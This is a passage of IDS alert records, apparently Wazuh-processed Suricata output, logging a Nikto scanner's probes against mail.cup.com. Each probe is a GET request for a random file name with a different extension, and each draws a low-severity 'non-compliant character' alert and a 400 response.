character","id":"86601","firedtimes":2,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.7549","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.345338+0000\",\"flow_id\":1697602987508313,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46940,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.Htm\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.345338+0000","flow_id":"1697602987508313.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46940","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.Htm","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.347250+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":3,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.9086","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.347250+0000\",\"flow_id\":1217064866564597,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46942,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.csc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.347250+0000","flow_id":"1217064866564597.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46942","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.csc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.349169+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":4,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.10623","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.349169+0000\",\"flow_id\":883960087990575,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46944,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.el\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.349169+0000","flow_id":"883960087990575.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46944","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.el","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.351261+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":5,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.12157","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.351261+0000\",\"flow_id\":455618704595240,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46946,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.idc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.351261+0000","flow_id":"455618704595240.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46946","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.idc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.353104+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":6,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.13693","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.353104+0000\",\"flow_id\":1306962827043002,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46948,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.access\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.353104+0000","flow_id":"1306962827043002.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46948","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.access","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.355207+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":7,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.15237","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.355207+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46950,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.355207+0000","flow_id":"1369948522440834.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46950","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.jsp+","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.358195+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":8,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.16777","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.358195+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46952,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.de\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.358195+0000","flow_id":"583080449044546.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46952","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.de","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.361389+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":9,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.18311","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.361389+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46954,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.en\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.361389+0000","flow_id":"570105352846820.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46954","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.en","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.365743+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":10,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.19845","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.365743+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46956,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.config\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.365743+0000","flow_id":"776469941489987.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46956","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.config","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.367902+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":11,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.21387","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.367902+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46958,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.et\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.367902+0000","flow_id":"829521377532493.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46958","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.et","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.370560+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":12,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.22921","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.370560+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46960,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.370560+0000","flow_id":"380826144121724.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46960","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.cmd","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.372779+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":13,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.24457","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.372779+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46962,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.372779+0000","flow_id":"319004384865496.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46962","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.x-shop","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.375251+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":14,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.25999","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.375251+0000\",\"flow_id\":1.67220255094931e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46964,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.dbc\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.375251+0000","flow_id":"1672202550949310.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46964","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.dbc","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.377295+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":15,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.27541","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.377295+0000\",\"flow_id\":2.17615683359514e+15,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46966,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.map\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.377295+0000","flow_id":"2176156833595140.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46966","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.map","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.379849+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":16,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.29083","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.379849+0000\",\"flow_id\":1414354189338696,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46968,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.Big5\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.379849+0000","flow_id":"1414354189338696.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46968","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.Big5","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.382662+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":17,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.30623","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.382662+0000\",\"flow_id\":268736087642508,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46970,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.10:100\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) 
